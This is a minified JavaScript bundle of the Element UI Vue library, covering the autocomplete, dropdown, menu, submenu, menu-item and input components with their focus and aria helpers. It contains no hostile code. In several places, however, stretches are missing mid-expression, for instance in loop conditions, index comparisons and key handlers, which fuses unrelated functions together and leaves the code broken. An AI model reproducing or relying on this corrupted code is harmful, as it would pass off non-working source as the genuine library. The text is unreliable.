e=this;this.$nextTick((function(t){e.popperJS&&e.updatePopper()}))},mounted:function(){this.$parent.popperElm=this.popperElm=this.$el,this.referenceElm=this.$parent.$refs.input.$refs.input||this.$parent.$refs.input.$refs.textarea,this.referenceList=this.$el.querySelector(".el-autocomplete-suggestion__list"),this.referenceList.setAttribute("role","listbox"),this.referenceList.setAttribute("id",this.id)},created:function(){var e=this;this.$on("visible",(function(t,i){e.dropdownWidth=i+"px",e.showPopper=t}))}},K=Y,U=o(K,B,z,!1,null,null,null);U.options.__file="packages/autocomplete/src/autocomplete-suggestions.vue";var G=U.exports,X=i(23),Z=i.n(X),Q={name:"ElAutocomplete",mixins:[O.a,Z()("input"),D.a],inheritAttrs:!1,componentName:"ElAutocomplete",components:{ElInput:m.a,ElAutocompleteSuggestions:G},directives:{Clickoutside:V.a},props:{valueKey:{type:String,default:"value"},popperClass:String,popperOptions:Object,placeholder:String,clearable:{type:Boolean,default:!1},disabled:Boolean,name:String,size:String,value:String,maxlength:Number,minlength:Number,autofocus:Boolean,fetchSuggestions:Function,triggerOnFocus:{type:Boolean,default:!0},customItem:String,selectWhenUnmatched:{type:Boolean,default:!1},prefixIcon:String,suffixIcon:String,label:String,debounce:{type:Number,default:300},placement:{type:String,default:"bottom-start"},hideLoading:Boolean,popperAppendToBody:{type:Boolean,default:!0},highlightFirstItem:{type:Boolean,default:!1}},data:function(){return{activated:!1,suggestions:[],loading:!1,highlightedIndex:-1,suggestionDisabled:!1}},computed:{suggestionVisible:function(){var e=this.suggestions,t=Array.isArray(e)&&e.length>0;return(t||this.loading)&&this.activated},id:function(){return"el-autocomplete-"+Object(b["generateId"])()}},watch:{suggestionVisible:function(e){var t=this.getInput();t&&this.broadcast("ElAutocompleteSuggestions","visible",[e,t.offsetWidth])}},methods:{getMigratingConfig:function(){return{props:{"custom-item":"custom-item is removed, use scoped slot instead.",props:"props is removed, use value-key instead."}}},getData:function(e){var t=this;this.suggestionDisabled||(this.loading=!0,this.fetchSuggestions(e,(function(e){t.loading=!1,t.suggestionDisabled||(Array.isArray(e)?(t.suggestions=e,t.highlightedIndex=t.highlightFirstItem?0:-1):console.error("[Element Error][Autocomplete]autocomplete suggestions must be an array"))})))},handleInput:function(e){if(this.$emit("input",e),this.suggestionDisabled=!1,!this.triggerOnFocus&&!e)return this.suggestionDisabled=!0,void(this.suggestions=[]);this.debouncedGetData(e)},handleChange:function(e){this.$emit("change",e)},handleFocus:function(e){this.activated=!0,this.$emit("focus",e),this.triggerOnFocus&&this.debouncedGetData(this.value)},handleBlur:function(e){this.$emit("blur",e)},handleClear:function(){this.activated=!1,this.$emit("clear")},close:function(e){this.activated=!1},handleKeyEnter:function(e){var t=this;this.suggestionVisible&&this.highlightedIndex>=0&&this.highlightedIndex=this.suggestions.length&&(e=this.suggestions.length-1);var t=this.$refs.suggestions.$el.querySelector(".el-autocomplete-suggestion__wrap"),i=t.querySelectorAll(".el-autocomplete-suggestion__list li"),n=i[e],s=t.scrollTop,r=n.offsetTop;r+n.scrollHeight>s+t.clientHeight&&(t.scrollTop+=n.scrollHeight),r=0&&this.resetTabindex(this.triggerElm),clearTimeout(this.timeout),this.timeout=setTimeout((function(){e.visible=!1}),"click"===this.trigger?0:this.hideTimeout))},handleClick:function(){this.disabled||(this.visible?this.hide():this.show())},handleTriggerKeyDown:function(e){var t=e.keyCode;[38,40].indexOf(t)>-1?(this.removeTabindex(),this.resetTabindex(this.menuItems[0]),this.menuItems[0].focus(),e.preventDefault(),e.stopPropagation()):13===t?this.handleClick():[9,27].indexOf(t)>-1&&this.hide()},handleItemKeyDown:function(e){var t=e.keyCode,i=e.target,n=this.menuItemsArray.indexOf(i),s=this.menuItemsArray.length-1,r=void 0;[38,40].indexOf(t)>-1?(r=38===t?0!==n?n-1:0:n-1&&(this.hide(),this.triggerElmFocus())},resetTabindex:function(e){this.removeTabindex(),e.setAttribute("tabindex","0")},removeTabindex:function(){this.triggerElm.setAttribute("tabindex","-1"),this.menuItemsArray.forEach((function(e){e.setAttribute("tabindex","-1")}))},initAria:function(){this.dropdownElm.setAttribute("id",this.listId),this.triggerElm.setAttribute("aria-haspopup","list"),this.triggerElm.setAttribute("aria-controls",this.listId),this.splitButton||(this.triggerElm.setAttribute("role","button"),this.triggerElm.setAttribute("tabindex",this.tabindex),this.triggerElm.setAttribute("class",(this.triggerElm.getAttribute("class")||"")+" el-dropdown-selfdefine"))},initEvent:function(){var e=this,t=this.trigger,i=this.show,n=this.hide,s=this.handleClick,r=this.splitButton,a=this.handleTriggerKeyDown,o=this.handleItemKeyDown;this.triggerElm=r?this.$refs.trigger.$el:this.$slots.default[0].elm;var l=this.dropdownElm;this.triggerElm.addEventListener("keydown",a),l.addEventListener("keydown",o,!0),r||(this.triggerElm.addEventListener("focus",(function(){e.focusing=!0})),this.triggerElm.addEventListener("blur",(function(){e.focusing=!1})),this.triggerElm.addEventListener("click",(function(){e.focusing=!1}))),"hover"===t?(this.triggerElm.addEventListener("mouseenter",i),this.triggerElm.addEventListener("mouseleave",n),l.addEventListener("mouseenter",i),l.addEventListener("mouseleave",n)):"click"===t&&this.triggerElm.addEventListener("click",s)},handleMenuItemClick:function(e,t){this.hideOnClick&&(this.visible=!1),this.$emit("command",e,t)},triggerElmFocus:function(){this.triggerElm.focus&&this.triggerElm.focus()},initDomOperation:function(){this.dropdownElm=this.popperElm,this.menuItems=this.dropdownElm.querySelectorAll("[tabindex='-1']"),this.menuItemsArray=[].slice.call(this.menuItems),this.initEvent(),this.initAria()}},render:function(e){var t=this,i=this.hide,n=this.splitButton,s=this.type,r=this.dropdownSize,a=this.disabled,o=function(e){t.$emit("click",e),i()},l=null;if(n)l=e("el-button-group",[e("el-button",{attrs:{type:s,size:r,disabled:a},nativeOn:{click:o}},[this.$slots.default]),e("el-button",{ref:"trigger",attrs:{type:s,size:r,disabled:a},class:"el-dropdown__caret-button"},[e("i",{class:"el-dropdown__icon el-icon-arrow-down"})])]);else{l=this.$slots.default;var c=l[0].data||{},u=c.attrs,h=void 0===u?{}:u;a&&!h.disabled&&(h.disabled=!0,c.attrs=h)}var d=a?null:this.$slots.dropdown;return e("div",{class:"el-dropdown",directives:[{name:"clickoutside",value:i}],attrs:{"aria-disabled":a}},[l,d])}},ue=ce,he=o(ue,ie,ne,!1,null,null,null);he.options.__file="packages/dropdown/src/dropdown.vue";var de=he.exports;de.install=function(e){e.component(de.name,de)};var pe=de,fe=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition",{attrs:{name:"el-zoom-in-top"},on:{"after-leave":e.doDestroy}},[i("ul",{directives:[{name:"show",rawName:"v-show",value:e.showPopper,expression:"showPopper"}],staticClass:"el-dropdown-menu el-popper",class:[e.size&&"el-dropdown-menu--"+e.size]},[e._t("default")],2)])},me=[];fe._withStripped=!0;var ve={name:"ElDropdownMenu",componentName:"ElDropdownMenu",mixins:[H.a],props:{visibleArrow:{type:Boolean,default:!0},arrowOffset:{type:Number,default:0}},data:function(){return{size:this.dropdown.dropdownSize}},inject:["dropdown"],created:function(){var e=this;this.$on("updatePopper",(function(){e.showPopper&&e.updatePopper()})),this.$on("visible",(function(t){e.showPopper=t}))},mounted:function(){this.dropdown.popperElm=this.popperElm=this.$el,this.referenceElm=this.dropdown.$el,this.dropdown.initDomOperation()},watch:{"dropdown.placement":{immediate:!0,handler:function(e){this.currentPlacement=e}}}},ge=ve,be=o(ge,fe,me,!1,null,null,null);be.options.__file="packages/dropdown/src/dropdown-menu.vue";var ye=be.exports;ye.install=function(e){e.component(ye.name,ye)};var _e=ye,xe=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("li",{staticClass:"el-dropdown-menu__item",class:{"is-disabled":e.disabled,"el-dropdown-menu__item--divided":e.divided},attrs:{"aria-disabled":e.disabled,tabindex:e.disabled?null:-1},on:{click:e.handleClick}},[e.icon?i("i",{class:e.icon}):e._e(),e._t("default")],2)},Ce=[];xe._withStripped=!0;var we={name:"ElDropdownItem",mixins:[O.a],props:{command:{},disabled:Boolean,divided:Boolean,icon:String},methods:{handleClick:function(e){this.dispatch("ElDropdown","menu-item-click",[this.command,this])}}},ke=we,Se=o(ke,xe,Ce,!1,null,null,null);Se.options.__file="packages/dropdown/src/dropdown-item.vue";var De=Se.exports;De.install=function(e){e.component(De.name,De)};var $e=De,Oe=Oe||{};Oe.Utils=Oe.Utils||{},Oe.Utils.focusFirstDescendant=function(e){for(var t=0;t=0;t--){var i=e.childNodes[t];if(Oe.Utils.attemptFocus(i)||Oe.Utils.focusLastDescendant(i))return!0}return!1},Oe.Utils.attemptFocus=function(e){if(!Oe.Utils.isFocusable(e))return!1;Oe.Utils.IgnoreUtilFocusChanges=!0;try{e.focus()}catch(t){}return Oe.Utils.IgnoreUtilFocusChanges=!1,document.activeElement===e},Oe.Utils.isFocusable=function(e){if(e.tabIndex>0||0===e.tabIndex&&null!==e.getAttribute("tabIndex"))return!0;if(e.disabled)return!1;switch(e.nodeName){case"A":return!!e.href&&"ignore"!==e.rel;case"INPUT":return"hidden"!==e.type&&"file"!==e.type;case"BUTTON":case"SELECT":case"TEXTAREA":return!0;default:return!1}},Oe.Utils.triggerEvent=function(e,t){var i=void 0;i=/^mouse|click/.test(t)?"MouseEvents":/^key/.test(t)?"KeyboardEvent":"HTMLEvents";for(var n=document.createEvent(i),s=arguments.length,r=Array(s>2?s-2:0),a=2;a=0;t--)e.splice(t,0,e[t]);e=e.join("")}return/^[0-9a-fA-F]{6}$/.test(e)?{red:parseInt(e.slice(0,2),16),green:parseInt(e.slice(2,4),16),blue:parseInt(e.slice(4,6),16)}:{red:255,green:255,blue:255}},mixColor:function(e,t){var i=this.getColorChannels(e),n=i.red,s=i.green,r=i.blue;return t>0?(n*=1-t,s*=1-t,r*=1-t):(n+=(255-n)*t,s+=(255-s)*t,r+=(255-r)*t),"rgb("+Math.round(n)+", "+Math.round(s)+", "+Math.round(r)+")"},addItem:function(e){this.$set(this.items,e.index,e)},removeItem:function(e){delete this.items[e.index]},addSubmenu:function(e){this.$set(this.submenus,e.index,e)},removeSubmenu:function(e){delete this.submenus[e.index]},openMenu:function(e,t){var i=this.openedMenus;-1===i.indexOf(e)&&(this.uniqueOpened&&(this.openedMenus=i.filter((function(e){return-1!==t.indexOf(e)}))),this.openedMenus.push(e))},closeMenu:function(e){var t=this.openedMenus.indexOf(e);-1!==t&&this.openedMenus.splice(t,1)},handleSubmenuClick:function(e){var t=e.index,i=e.indexPath,n=-1!==this.openedMenus.indexOf(t);n?(this.closeMenu(t),this.$emit("close",t,i)):(this.openMenu(t,i),this.$emit("open",t,i))},handleItemClick:function(e){var t=this,i=e.index,n=e.indexPath,s=this.activeIndex,r=null!==e.index;r&&(this.activeIndex=e.index),this.$emit("select",i,n,e),("horizontal"===this.mode||this.collapse)&&(this.openedMenus=[]),this.router&&r&&this.routeToItem(e,(function(e){if(t.activeIndex=s,e){if("NavigationDuplicated"===e.name)return;console.error(e)}}))},initOpenedMenu:function(){var e=this,t=this.activeIndex,i=this.items[t];if(i&&"horizontal"!==this.mode&&!this.collapse){var n=i.indexPath;n.forEach((function(t){var i=e.submenus[t];i&&e.openMenu(t,i.indexPath)}))}},routeToItem:function(e,t){var i=e.route||e.index;try{this.$router.push(i,(function(){}),t)}catch(n){console.error(n)}},open:function(e){var t=this,i=this.submenus[e.toString()].indexPath;i.forEach((function(e){return t.openMenu(e,i)}))},close:function(e){this.closeMenu(e)}},mounted:function(){this.initOpenedMenu(),this.$on("item-click",this.handleItemClick),this.$on("submenu-click",this.handleSubmenuClick),"horizontal"===this.mode&&new Le(this.$el),this.$watch("items",this.updateActiveIndex)}},Be=Ve,ze=o(Be,je,Fe,!1,null,null,null);ze.options.__file="packages/menu/src/menu.vue";var Re=ze.exports;Re.install=function(e){e.component(Re.name,Re)};var He,We,qe=Re,Ye=i(21),Ke=i.n(Ye),Ue={inject:["rootMenu"],computed:{indexPath:function(){var e=[this.index],t=this.$parent;while("ElMenu"!==t.$options.componentName)t.index&&e.unshift(t.index),t=t.$parent;return e},parentMenu:function(){var e=this.$parent;while(e&&-1===["ElMenu","ElSubmenu"].indexOf(e.$options.componentName))e=e.$parent;return e},paddingStyle:function(){if("vertical"!==this.rootMenu.mode)return{};var e=20,t=this.$parent;if(this.rootMenu.collapse)e=20;else while(t&&"ElMenu"!==t.$options.componentName)"ElSubmenu"===t.$options.componentName&&(e+=20),t=t.$parent;return{paddingLeft:e+"px"}}}},Ge={props:{transformOrigin:{type:[Boolean,String],default:!1},offset:H.a.props.offset,boundariesPadding:H.a.props.boundariesPadding,popperOptions:H.a.props.popperOptions},data:H.a.data,methods:H.a.methods,beforeDestroy:H.a.beforeDestroy,deactivated:H.a.deactivated},Xe={name:"ElSubmenu",componentName:"ElSubmenu",mixins:[Ue,O.a,Ge],components:{ElCollapseTransition:Ke.a},props:{index:{type:String,required:!0},showTimeout:{type:Number,default:300},hideTimeout:{type:Number,default:300},popperClass:String,disabled:Boolean,popperAppendToBody:{type:Boolean,default:void 0}},data:function(){return{popperJS:null,timeout:null,items:{},submenus:{},mouseInChild:!1}},watch:{opened:function(e){var t=this;this.isMenuPopup&&this.$nextTick((function(e){t.updatePopper()}))}},computed:{appendToBody:function(){return void 0===this.popperAppendToBody?this.isFirstLevel:this.popperAppendToBody},menuTransitionName:function(){return this.rootMenu.collapse?"el-zoom-in-left":"el-zoom-in-top"},opened:function(){return this.rootMenu.openedMenus.indexOf(this.index)>-1},active:function(){var e=!1,t=this.submenus,i=this.items;return Object.keys(i).forEach((function(t){i[t].active&&(e=!0)})),Object.keys(t).forEach((function(i){t[i].active&&(e=!0)})),e},hoverBackground:function(){return this.rootMenu.hoverBackground},backgroundColor:function(){return this.rootMenu.backgroundColor||""},activeTextColor:function(){return this.rootMenu.activeTextColor||""},textColor:function(){return this.rootMenu.textColor||""},mode:function(){return this.rootMenu.mode},isMenuPopup:function(){return this.rootMenu.isMenuPopup},titleStyle:function(){return"horizontal"!==this.mode?{color:this.textColor}:{borderBottomColor:this.active?this.rootMenu.activeTextColor?this.activeTextColor:"":"transparent",color:this.active?this.activeTextColor:this.textColor}},isFirstLevel:function(){var e=!0,t=this.$parent;while(t&&t!==this.rootMenu){if(["ElSubmenu","ElMenuItemGroup"].indexOf(t.$options.componentName)>-1){e=!1;break}t=t.$parent}return e}},methods:{handleCollapseToggle:function(e){e?this.initPopper():this.doDestroy()},addItem:function(e){this.$set(this.items,e.index,e)},removeItem:function(e){delete this.items[e.index]},addSubmenu:function(e){this.$set(this.submenus,e.index,e)},removeSubmenu:function(e){delete this.submenus[e.index]},handleClick:function(){var e=this.rootMenu,t=this.disabled;"hover"===e.menuTrigger&&"horizontal"===e.mode||e.collapse&&"vertical"===e.mode||t||this.dispatch("ElMenu","submenu-click",this)},handleMouseenter:function(e){var t=this,i=arguments.length>1&&void 0!==arguments[1]?arguments[1]:this.showTimeout;if("ActiveXObject"in window||"focus"!==e.type||e.relatedTarget){var n=this.rootMenu,s=this.disabled;"click"===n.menuTrigger&&"horizontal"===n.mode||!n.collapse&&"vertical"===n.mode||s||(this.dispatch("ElSubmenu","mouse-enter-child"),clearTimeout(this.timeout),this.timeout=setTimeout((function(){t.rootMenu.openMenu(t.index,t.indexPath)}),i),this.appendToBody&&this.$parent.$el.dispatchEvent(new MouseEvent("mouseenter")))}},handleMouseleave:function(){var e=this,t=arguments.length>0&&void 0!==arguments[0]&&arguments[0],i=this.rootMenu;"click"===i.menuTrigger&&"horizontal"===i.mode||!i.collapse&&"vertical"===i.mode||(this.dispatch("ElSubmenu","mouse-leave-child"),clearTimeout(this.timeout),this.timeout=setTimeout((function(){!e.mouseInChild&&e.rootMenu.closeMenu(e.index)}),this.hideTimeout),this.appendToBody&&t&&"ElSubmenu"===this.$parent.$options.name&&this.$parent.handleMouseleave(!0))},handleTitleMouseenter:function(){if("horizontal"!==this.mode||this.rootMenu.backgroundColor){var e=this.$refs["submenu-title"];e&&(e.style.backgroundColor=this.rootMenu.hoverBackground)}},handleTitleMouseleave:function(){if("horizontal"!==this.mode||this.rootMenu.backgroundColor){var e=this.$refs["submenu-title"];e&&(e.style.backgroundColor=this.rootMenu.backgroundColor||"")}},updatePlacement:function(){this.currentPlacement="horizontal"===this.mode&&this.isFirstLevel?"bottom-start":"right-start"},initPopper:function(){this.referenceElm=this.$el,this.popperElm=this.$refs.menu,this.updatePlacement()}},created:function(){var e=this;this.$on("toggle-collapse",this.handleCollapseToggle),this.$on("mouse-enter-child",(function(){e.mouseInChild=!0,clearTimeout(e.timeout)})),this.$on("mouse-leave-child",(function(){e.mouseInChild=!1,clearTimeout(e.timeout)}))},mounted:function(){this.parentMenu.addSubmenu(this),this.rootMenu.addSubmenu(this),this.initPopper()},beforeDestroy:function(){this.parentMenu.removeSubmenu(this),this.rootMenu.removeSubmenu(this)},render:function(e){var t=this,i=this.active,n=this.opened,s=this.paddingStyle,r=this.titleStyle,a=this.backgroundColor,o=this.rootMenu,l=this.currentPlacement,c=this.menuTransitionName,u=this.mode,h=this.disabled,d=this.popperClass,p=this.$slots,f=this.isFirstLevel,m=e("transition",{attrs:{name:c}},[e("div",{ref:"menu",directives:[{name:"show",value:n}],class:["el-menu--"+u,d],on:{mouseenter:function(e){return t.handleMouseenter(e,100)},mouseleave:function(){return t.handleMouseleave(!0)},focus:function(e){return t.handleMouseenter(e,100)}}},[e("ul",{attrs:{role:"menu"},class:["el-menu el-menu--popup","el-menu--popup-"+l],style:{backgroundColor:o.backgroundColor||""}},[p.default])])]),v=e("el-collapse-transition",[e("ul",{attrs:{role:"menu"},class:"el-menu el-menu--inline",directives:[{name:"show",value:n}],style:{backgroundColor:o.backgroundColor||""}},[p.default])]),g="horizontal"===o.mode&&f||"vertical"===o.mode&&!o.collapse?"el-icon-arrow-down":"el-icon-arrow-right";return e("li",{class:{"el-submenu":!0,"is-active":i,"is-opened":n,"is-disabled":h},attrs:{role:"menuitem","aria-haspopup":"true","aria-expanded":n},on:{mouseenter:this.handleMouseenter,mouseleave:function(){return t.handleMouseleave(!1)},focus:this.handleMouseenter}},[e("div",{class:"el-submenu__title",ref:"submenu-title",on:{click:this.handleClick,mouseenter:this.handleTitleMouseenter,mouseleave:this.handleTitleMouseleave},style:[s,r,{backgroundColor:a}]},[p.title,e("i",{class:["el-submenu__icon-arrow",g]})]),this.isMenuPopup?m:v])}},Ze=Xe,Qe=o(Ze,He,We,!1,null,null,null);Qe.options.__file="packages/menu/src/submenu.vue";var Je=Qe.exports;Je.install=function(e){e.component(Je.name,Je)};var et=Je,tt=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("li",{staticClass:"el-menu-item",class:{"is-active":e.active,"is-disabled":e.disabled},style:[e.paddingStyle,e.itemStyle,{backgroundColor:e.backgroundColor}],attrs:{role:"menuitem",tabindex:"-1"},on:{click:e.handleClick,mouseenter:e.onMouseEnter,focus:e.onMouseEnter,blur:e.onMouseLeave,mouseleave:e.onMouseLeave}},["ElMenu"===e.parentMenu.$options.componentName&&e.rootMenu.collapse&&e.$slots.title?i("el-tooltip",{attrs:{effect:"dark",placement:"right"}},[i("div",{attrs:{slot:"content"},slot:"content"},[e._t("title")],2),i("div",{staticStyle:{position:"absolute",left:"0",top:"0",height:"100%",width:"100%",display:"inline-block","box-sizing":"border-box",padding:"0 20px"}},[e._t("default")],2)]):[e._t("default"),e._t("title")]],2)},it=[];tt._withStripped=!0;var nt=i(26),st=i.n(nt),rt={name:"ElMenuItem",componentName:"ElMenuItem",mixins:[Ue,O.a],components:{ElTooltip:st.a},props:{index:{default:null,validator:function(e){return"string"===typeof e||null===e}},route:[String,Object],disabled:Boolean},computed:{active:function(){return this.index===this.rootMenu.activeIndex},hoverBackground:function(){return this.rootMenu.hoverBackground},backgroundColor:function(){return this.rootMenu.backgroundColor||""},activeTextColor:function(){return this.rootMenu.activeTextColor||""},textColor:function(){return this.rootMenu.textColor||""},mode:function(){return this.rootMenu.mode},itemStyle:function(){var e={color:this.active?this.activeTextColor:this.textColor};return"horizontal"!==this.mode||this.isNested||(e.borderBottomColor=this.active?this.rootMenu.activeTextColor?this.activeTextColor:"":"transparent"),e},isNested:function(){return this.parentMenu!==this.rootMenu}},methods:{onMouseEnter:function(){("horizontal"!==this.mode||this.rootMenu.backgroundColor)&&(this.$el.style.backgroundColor=this.hoverBackground)},onMouseLeave:function(){("horizontal"!==this.mode||this.rootMenu.backgroundColor)&&(this.$el.style.backgroundColor=this.backgroundColor)},handleClick:function(){this.disabled||(this.dispatch("ElMenu","item-click",this),this.$emit("click",this))}},mounted:function(){this.parentMenu.addItem(this),this.rootMenu.addItem(this)},beforeDestroy:function(){this.parentMenu.removeItem(this),this.rootMenu.removeItem(this)}},at=rt,ot=o(at,tt,it,!1,null,null,null);ot.options.__file="packages/menu/src/menu-item.vue";var lt=ot.exports;lt.install=function(e){e.component(lt.name,lt)};var ct=lt,ut=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("li",{staticClass:"el-menu-item-group"},[i("div",{staticClass:"el-menu-item-group__title",style:{paddingLeft:e.levelPadding+"px"}},[e.$slots.title?e._t("title"):[e._v(e._s(e.title))]],2),i("ul",[e._t("default")],2)])},ht=[];ut._withStripped=!0;var dt={name:"ElMenuItemGroup",componentName:"ElMenuItemGroup",inject:["rootMenu"],props:{title:{type:String}},data:function(){return{paddingLeft:20}},computed:{levelPadding:function(){var e=20,t=this.$parent;if(this.rootMenu.collapse)return 20;while(t&&"ElMenu"!==t.$options.componentName)"ElSubmenu"===t.$options.componentName&&(e+=20),t=t.$parent;return e}}},pt=dt,ft=o(pt,ut,ht,!1,null,null,null);ft.options.__file="packages/menu/src/menu-item-group.vue";var mt=ft.exports;mt.install=function(e){e.component(mt.name,mt)};var vt=mt,gt=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{class:["textarea"===e.type?"el-textarea":"el-input",e.inputSize?"el-input--"+e.inputSize:"",{"is-disabled":e.inputDisabled,"is-exceed":e.inputExceed,"el-input-group":e.$slots.prepend||e.$slots.append,"el-input-group--append":e.$slots.append,"el-input-group--prepend":e.$slots.prepend,"el-input--prefix":e.$slots.prefix||e.prefixIcon,"el-input--suffix":e.$slots.suffix||e.suffixIcon||e.clearable||e.showPassword}],on:{mouseenter:function(t){e.hovering=!0},mouseleave:function(t){e.hovering=!1}}},["textarea"!==e.type?[e.$slots.prepend?i("div",{staticClass:"el-input-group__prepend"},[e._t("prepend")],2):e._e(),"textarea"!==e.type?i("input",e._b({ref:"input",staticClass:"el-input__inner",attrs:{tabindex:e.tabindex,type:e.showPassword?e.passwordVisible?"text":"password":e.type,disabled:e.inputDisabled,readonly:e.readonly,autocomplete:e.autoComplete||e.autocomplete,"aria-label":e.label},on:{compositionstart:e.handleCompositionStart,compositionupdate:e.handleCompositionUpdate,compositionend:e.handleCompositionEnd,input:e.handleInput,focus:e.handleFocus,blur:e.handleBlur,change:e.handleChange}},"input",e.$attrs,!1)):e._e(),e.$slots.prefix||e.prefixIcon?i("span",{staticClass:"el-input__prefix"},[e._t("prefix"),e.prefixIcon?i("i",{staticClass:"el-input__icon",class:e.prefixIcon}):e._e()],2):e._e(),e.getSuffixVisible()?i("span",{staticClass:"el-input__suffix"},[i("span",{staticClass:"el-input__suffix-inner"},[e.showClear&&e.showPwdVisible&&e.isWordLimitVisible?e._e():[e._t("suffix"),e.suffixIcon?i("i",{staticClass:"el-input__icon",class:e.suffixIcon}):e._e()],e.showClear?i("i",{staticClass:"el-input__icon el-icon-circle-close el-input__clear",on:{mousedown:function(e){e.preventDefault()},click:e.clear}}):e._e(),e.showPwdVisible?i("i",{staticClass:"el-input__icon el-icon-view el-input__clear",on:{click:e.handlePasswordVisible}}):e._e(),e.isWordLimitVisible?i("span",{staticClass:"el-input__count"},[i("span",{staticClass:"el-input__count-inner"},[e._v("\n "+e._s(e.textLength)+"/"+e._s(e.upperLimit)+"\n ")])]):e._e()],2),e.validateState?i("i",{staticClass:"el-input__icon",class:["el-input__validateIcon",e.validateIcon]}):e._e()]):e._e(),e.$slots.append?i("div",{staticClass:"el-input-group__append"},[e._t("append")],2):e._e()]:i("textarea",e._b({ref:"textarea",staticClass:"el-textarea__inner",style:e.textareaStyle,attrs:{tabindex:e.tabindex,disabled:e.inputDisabled,readonly:e.readonly,autocomplete:e.autoComplete||e.autocomplete,"aria-label":e.label},on:{compositionstart:e.handleCompositionStart,compositionupdate:e.handleCompositionUpdate,compositionend:e.handleCompositionEnd,input:e.handleInput,focus:e.handleFocus,blur:e.handleBlur,change:e.handleChange}},"textarea",e.$attrs,!1)),e.isWordLimitVisible&&"textarea"===e.type?i("span",{staticClass:"el-input__count"},[e._v(e._s(e.textLength)+"/"+e._s(e.upperLimit))]):e._e()],2)},bt=[];gt._withStripped=!0;var yt=void 0,_t="\n height:0 !important;\n visibility:hidden !important;\n overflow:hidden !important;\n position:absolute !important;\n z-index:-1000 !important;\n top:0 !important;\n right:0 !important\n",xt=["letter-spacing","line-height","padding-top","padding-bottom","font-family","font-weight","font-size","text-rendering","text-transform","width","text-indent","padding-left","padding-right","border-width","box-sizing"];function Ct(e){var t=window.getComputedStyle(e),i=t.getPropertyValue("box-sizing"),n=parseFloat(t.getPropertyValue("padding-bottom"))+parseFloat(t.getPropertyValue("padding-top")),s=parseFloat(t.getPropertyValue("border-bottom-width"))+parseFloat(t.getPropertyValue("border-top-width")),r=xt.map((function(e){return e+":"+t.getPropertyValue(e)})).join(";");return{contextStyle:r,paddingSize:n,borderSize:s,boxSizing:i}}function wt(e){var t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:1,i=arguments.length>2&&void 0!==arguments[2]?arguments[2]:null;yt||(yt=document.createElement("textarea"),document.body.appendChild(yt));var n=Ct(e),s=n.paddingSize,r=n.borderSize,a=n.boxSizing,o=n.contextStyle;yt.setAttribute("style",o+";"+_t),yt.value=e.value||e.placeholder||"";var l=yt.scrollHeight,c={};"border-box"===a?l+=r:"content-box"===a&&(l-=s),yt.value="";var u=yt.scrollHeight-s;if(null!==t){var h=u*t;"border-box"===a&&(h=h+s+r),l=Math.max(h,l),c.minHeight=h+"px"}if(null!==i){var d=u*i;"border-box"===a&&(d=d+s+r),l=Math.min(d,l)}return c.height=l+"px",yt.parentNode&&yt.parentNode.removeChild(yt),yt=null,c}var kt=i(7),St=i.n(kt),Dt=i(19),$t={name:"ElInput",componentName:"ElInput",mixins:[O.a,D.a],inheritAttrs:!1,inject:{elForm:{default:""},elFormItem:{default:""}},data:function(){return{textareaCalcStyle:{},hovering:!1,focused:!1,isComposing:!1,passwordVisible:!1}},props:{value:[String,Number],size:String,resize:String,form:String,disabled:Boolean,readonly:Boolean,type:{type:String,default:"text"},autosize:{type:[Boolean,Object],default:!1},autocomplete:{type:String,default:"off"},autoComplete:{type:String,validator:function(e){return!0}},validateEvent:{type:Boolean,default:!0},suffixIcon:String,prefixIcon:String,label:String,clearable:{type:Boolean,default:!1},showPassword:{type:Boolean,default:!1},showWordLimit:{type:Boolean,default:!1},tabindex:String},computed:{_elFormItemSize:function(){return(this.elFormItem||{}).elFormItemSize},validateState:function(){return this.elFormItem?this.elFormItem.validateState:""},needStatusIcon:function(){return!!this.elForm&&this.elForm.statusIcon},validateIcon:function(){return{validating:"el-icon-loading",success:"el-icon-circle-check",error:"el-icon-circle-close"}[this.validateState]},textareaStyle:function(){return St()({},this.textareaCalcStyle,{resize:this.resize})},inputSize:function(){return this.size||this._elFormItemSize||(this.$ELEMENT||{}).size},inputDisabled:function(){return this.disabled||(this.elForm||{}).disabled},nativeInputValue:function(){return null===this.value||void 0===this.value?"":String(this.value)},showClear:function(){return this.clearable&&!this.inputDisabled&&!this.readonly&&this.nativeInputValue&&(this.focused||this.hovering)},showPwdVisible:function(){return this.showPassword&&!this.inputDisabled&&!this.readonly&&(!!this.nativeInputValue||this.focused)},isWordLimitVisible:function(){return this.showWordLimit&&this.$attrs.maxlength&&("text"===this.type||"textarea"===this.type)&&!this.inputDisabled&&!this.readonly&&!this.showPassword},upperLimit:function(){return this.$attrs.maxlength},textLength:function(){return"number"===typeof this.value?String(this.value).length:(this.value||"").length},inputExceed:function(){return this.isWordLimitVisible&&this.textLength>this.upperLimit}},watch:{value:function(e){this.$nextTick(this.resizeTextarea),this.validateEvent&&this.dispatch("ElFormItem","el.form.change",[e])},nativeInputValue:function(){this.setNativeInputValue()},type:function(){var e=this;this.$nextTick((function(){e.setNativeInputValue(),e.resizeTextarea(),e.updateIconOffset()}))}},methods:{focus:function(){this.getInput().focus()},blur:function(){this.getInput().blur()},getMigratingConfig:function(){return{props:{icon:"icon is removed, use suffix-icon / prefix-icon instead.","on-icon-click":"on-icon-click is removed."},events:{click:"click is removed."}}},handleBlur:function(e){this.focused=!1,this.$emit("blur",e),this.validateEvent&&this.dispatch("ElFormItem","el.form.blur",[this.value])},select:function(){this.getInput().select()},resizeTextarea:function(){if(!this.$isServer){var e=this.autosize,t=this.type;if("textarea"===t)if(e){var i=e.minRows,n=e.maxRows;this.textareaCalcStyle=wt(this.$refs.textarea,i,n)}else this.textareaCalcStyle={minHeight:wt(this.$refs.textarea).minHeight}}},setNativeInputValue:function(){var e=this.getInput();e&&e.value!==this.nativeInputValue&&(e.value=this.nativeInputValue)},handleFocus:function(e){this.focused=!0,this.$emit("focus",e)},handleCompositionStart:function(e){this.$emit("compositionstart",e),this.isComposing=!0},handleCompositionUpdate:function(e){this.$emit("compositionupdate",e);var 